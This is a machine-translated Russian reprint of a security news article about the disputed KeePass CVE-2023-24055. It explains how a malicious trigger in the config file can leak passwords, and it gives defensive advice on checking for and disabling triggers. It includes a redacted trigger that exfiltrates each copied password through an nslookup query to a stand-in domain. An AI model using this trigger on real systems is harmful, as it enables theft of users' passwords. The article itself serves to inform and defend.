Это были важные новости для менеджеров паролей — тех удобных утилит, которые помогают вам придумывать разные пароли для каждого веб-сайта, который вы используете, а затем отслеживать их все.
В конце 2022 года настала очередь LastPass быть во всех новостях, когда компания наконец признала, что взлом, который произошел в августе 2022 года, действительно привел к паролю клиентов. хранилища крадут из облачного сервиса, где они были зарезервированы.
(Сами пароли не были украдены, потому что хранилища были зашифрованы, а у LastPass не было копий чьего-либо «мастер-ключа» для самих файлов резервных хранилищ, но это было лучше, чем большинство людей были бы рады услышать.)
Затем настала очередь LifeLock быть во всех новостях, когда компания предупредила о том, что выглядело как сыпь атаки подбора пароля, вероятно, на основе паролей, украденных с совершенно другого веб-сайта, возможно, некоторое время назад, и, возможно, недавно купленных в даркнете.
Сам LifeLock не был взломан, но некоторые из его пользователей взломали благодаря поведению, связанному с обменом паролями, вызванному рисками, о которых они, возможно, даже не помнят.
Конкуренты 1Password и BitWarden недавно также были в новостях, основываясь на сообщениях о вредоносной рекламе, по-видимому, непреднамеренно запущенной Google, которая убедительно заманивала пользователей на копии страниц входа в систему, направленные на фишинг данных их учетных записей.
Теперь настала очередь KeePass в новостях, на этот раз из-за еще одной проблемы кибербезопасности: предполагаемого уязвимость, жаргонный термин, используемый для ошибок в программном обеспечении, которые приводят к дырам в кибербезопасности, которые злоумышленники могут использовать в злых целях.
Перехват паролей стал проще
Мы относимся к нему как к уязвимость здесь, потому что у него есть официальный идентификатор ошибки, выданный Национальным институтом стандартов и технологий США.
Ошибка была названа CVE-2023-24055: Злоумышленник, имеющий доступ для записи в файл конфигурации XML, [может] получить пароли в открытом виде, добавив триггер экспорта.
Утверждение о возможности получения паролей в открытом виде, к сожалению, верно.
Если у меня есть доступ для записи к вашим личным файлам, включая ваши так называемые %APPDATA%
каталоге, я могу незаметно изменить раздел конфигурации, чтобы изменить любые настройки KeePass, которые вы уже настроили, или добавить настройки, если вы ничего не меняли сознательно…
…и я могу на удивление легко украсть ваши незашифрованные пароли, либо в большом количестве, например, путем создания дампа всей базы данных в виде незашифрованного CSV-файла, либо по мере их использования, например, установив «программный хук», который срабатывает каждый раз, когда вы получаете доступ к пароль от базы.
Обратите внимание, что мне не нужно Администратор привилегиями, потому что мне не нужно возиться с фактическим каталогом установки, в котором хранится приложение KeePass, который обычно закрыт для обычных пользователей.
И мне не нужен доступ к каким-либо заблокированным глобальным настройкам конфигурации.
Интересно, что KeePass делает все возможное, чтобы предотвратить перехват ваших паролей, когда вы их используете, в том числе с помощью методов защиты от несанкционированного доступа, чтобы остановить различные трюки с клавиатурными шпионами даже от пользователей, которые уже имеют полномочия системного администратора.
Но программное обеспечение KeePass также позволяет на удивление легко считывать данные паролей в виде открытого текста, возможно, способами, которые вы могли бы счесть «слишком простыми» даже для тех, кто не является администратором.
Использование графического интерфейса KeePass для создания Вызывать событие для запуска каждый раз, когда вы копируете пароль в буфер обмена, и настроить это событие для выполнения поиска DNS, включающего как имя пользователя, так и рассматриваемый незашифрованный пароль:
Затем мы могли бы скопировать не очень очевидную настройку XML для этой опции из нашего собственного локального файла конфигурации в файл конфигурации другого пользователя в системе, после чего они тоже обнаружат, что их пароли просочились через Интернет через поиск DNS.
Несмотря на то, что данные конфигурации XML в значительной степени удобочитаемы и информативны, KeePass любопытным образом использует случайные строки данных, известные как GUID (сокращение от глобально уникальные идентификаторы) для обозначения различных Вызывать настройки, так что даже хорошо информированному пользователю понадобится обширный справочный список, чтобы понять, какие триггеры установлены и как.
Вот как выглядит наш триггер утечки DNS, хотя мы отредактировали некоторые детали, чтобы вы не могли причинить немедленный вред, просто скопировав и вставив этот текст напрямую:
ХХХХХХХХХХХХХХХХ Копировать Украсть вещи с помощью DNS-запросов ХХХХХХХХХХХХХХХХ 0ХХХХХХХХХХХХХХХХ нслукап ХХХХХ.ХХХХХ.бла.тест Истинный 1
Когда этот триггер активен, доступ к паролю KeePass приводит к утечке открытого текста в ненавязчивом поиске DNS в домен по моему выбору, который blah.test
в этом примере.
Обратите внимание, что в реальной жизни злоумышленники почти наверняка зашифруют или запутают украденный текст, что не только затруднит обнаружение утечек DNS, но и позаботится о паролях, содержащих символы, отличные от ASCII, такие как буквы с диакритическими знаками или смайлики. которые иначе нельзя использовать в именах DNS:
Но действительно ли это ошибка?
Однако каверзный вопрос заключается в том, «Это действительно ошибка или это просто мощная функция, которой может злоупотребить кто-то, кому уже нужен как минимум такой же контроль над вашими личными файлами, как и вам?»
Проще говоря, является ли это уязвимостью, если кто-то, кто уже имеет контроль над вашей учетной записью, может вмешиваться в файлы, к которым ваша учетная запись должна иметь доступ в любом случае?
Даже если вы надеетесь, что менеджер pssword будет включать множество дополнительных уровней защиты от несанкционированного доступа, чтобы затруднить злоупотребление ошибками/функциями такого рода, следует CVE-2023-24055 действительно быть уязвимостью в списке CVE?
Если да, то не будут ли такие команды, как DEL
(удалить файл) и FORMAT
тоже должны быть "баги"?
И разве само существование PowerShell, которое значительно упрощает провоцирование потенциально опасного поведения (попробуйте powerhsell get-clipboard
, например), быть уязвимостью самой по себе?
Это позиция KeePass, подтвержденная следующим текстом, который был добавлен в деталь "жучок" на сайте НИСТ:
** СПОРА ** […] ПРИМЕЧАНИЕ: позиция производителя заключается в том, что база данных паролей не предназначена для защиты от злоумышленника, имеющего такой уровень доступа к локальному ПК.
Что делать?
Если вы являетесь автономным пользователем KeePass, вы можете проверить наличие мошеннических триггеров, таких как «DNS Stealer», который мы создали выше, открыв приложение KeePass и просмотрев Инструменты > Триггеры… окна:
Обратите внимание, что вы можете повернуть весь Вызывать выключить систему из этого окна, просто сняв флажок [ ] Enable trigger system
вариант…
… но это не глобальная настройка, поэтому ее можно снова включить через локальный файл конфигурации, и поэтому она защищает только вас от ошибок, а не от злоумышленника, имеющего доступ к вашей учетной записи.
Вы можете принудительно отключить эту опцию для всех на компьютере, без возможности включить ее самостоятельно, изменив глобальный файл блокировки. KeePass.config.enforced.XML
, найденный в каталоге, где установлена сама программа приложения.
Триггеры будут принудительно отключены для всех, если ваш глобальный XML-файл принудительного применения выглядит следующим образом:
ЛОЖЬ
(Если вам интересно, у злоумышленника, имеющего доступ для записи в каталог приложения, чтобы отменить это изменение, почти наверняка будет достаточно мощности системного уровня, чтобы изменить сам исполняемый файл KeePass или установить и активировать автономный кейлоггер в любом случае.)
Если вы сетевой администратор, которому поручено заблокировать KeePass на компьютерах ваших пользователей, чтобы он оставался достаточно гибким, чтобы помочь им, но недостаточно гибким, чтобы они могли по ошибке помочь киберпреступникам, мы рекомендуем прочитать KeePass Проблемы с безопасностью страницы, Триггеры страница, а Принудительная конфигурация стр.
- SEO-контент и PR-распределение. Получите усиление сегодня.
- Платоблокчейн. Интеллект метавселенной Web3. Расширение знаний. Доступ здесь.
- Источник: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- в состоянии
- О нас
- выше
- Absolute
- доступ
- доступа
- Учетная запись
- активный
- добавленный
- признал
- объявления
- После
- против
- Все
- утверждаемый
- уже
- и
- Другой
- приложение
- Применение
- Август
- автор
- автоматический
- назад
- со спинкой
- Фоновое изображение
- Восстановление
- основанный
- , так как:
- не являетесь
- граница
- Дно
- нарушение
- Ошибка
- ошибки
- захватить
- заботится
- случаев
- вызванный
- Причины
- Центр
- конечно
- изменение
- символы
- проверка
- выбор
- утверждать
- ближе
- облако
- цвет
- как
- Компания
- полностью
- компьютер
- компьютеры
- Условия
- Конфигурация
- Рассматривать
- контроль
- копии
- может
- чехол для варгана
- Создайте
- создали
- CVE
- киберпреступники
- Информационная безопасность
- опасно
- темно
- Dark Web
- данным
- База данных
- подробнее
- DID
- различный
- непосредственно
- Дисплей
- DNS
- домен
- Dont
- вниз
- дублированный
- легче
- легко
- или
- зашифрованный
- принуждение
- достаточно
- Весь
- Даже
- События
- Каждая
- все члены
- пример
- Эксплуатировать
- экспорт
- обширный
- дополнительно
- Особенность
- несколько
- Файл
- Файлы
- в заключение
- Найдите
- гибкого
- после
- Форс-мажор
- найденный
- от
- получить
- получающий
- Глобальный
- идет
- удобный
- счастливый
- имеющий
- высота
- помощь
- здесь
- Отверстия
- надежды
- зависать
- Как
- Однако
- HTML
- HTTPS
- идентификатор
- немедленная
- in
- включают
- включены
- В том числе
- информативный
- устанавливать
- пример
- Институт
- Интернет
- вопрос
- Выпущен
- IT
- саму трезвость
- жаргон
- Сохранить
- известный
- в значительной степени
- LastPass
- слоев
- вести
- утечка
- Утечки
- уровень
- Список
- локальным
- смотрел
- ВЗГЛЯДЫ
- поиск
- сделанный
- сделать
- ДЕЛАЕТ
- менеджер
- Менеджеры
- Маржа
- макс-ширина
- может быть
- ошибка
- ошибки
- изменять
- самых
- имена
- национальный
- Необходимость
- сеть
- Новости
- NIST
- "обычные"
- получать
- Официальный представитель в Грузии
- открытие
- Опция
- в противном случае
- собственный
- параметр
- Пароль
- пароли
- Пол
- PC
- Люди
- возможно
- личного
- фишинг
- Простой текст
- Платон
- Платон Интеллектуальные данные
- ПлатонДанные
- должность
- Блог
- потенциально
- мощностью
- мощный
- полномочия
- PowerShell
- частная
- привилегии
- вероятно
- FitPartner™
- купленный
- целей
- положил
- вопрос
- случайный
- сыпь
- Reading
- недавно
- рекомендовать
- регулярный
- помнить
- ответ
- Сообщается
- Отчеты
- обратный
- рисках,
- Run
- Раздел
- безопасный
- смысл
- обслуживание
- набор
- установка
- настройки
- Короткое
- должен
- просто
- So
- Software
- твердый
- некоторые
- Кто-то
- Спотовая торговля
- автономные
- стандартов
- По-прежнему
- украли
- Stop
- хранить
- такие
- предполагаемый
- SVG
- система
- взять
- снижения вреда
- Технологии
- Ассоциация
- их
- сами
- следовательно
- Через
- время
- в
- слишком
- топ
- трек
- переход
- прозрачный
- вызвать
- правда
- ОЧЕРЕДЬ
- Оказалось
- типично
- созданного
- URL
- us
- использование
- Информация о пользователе
- пользователей
- коммунальные услуги
- различный
- Хранилище
- своды
- с помощью
- уязвимость
- W3
- способы
- Web
- Вебсайт
- Недели
- Что
- который
- КТО
- будете
- интересно
- Работа
- бы
- записывать
- XML
- ВАШЕ
- себя
- зефирнет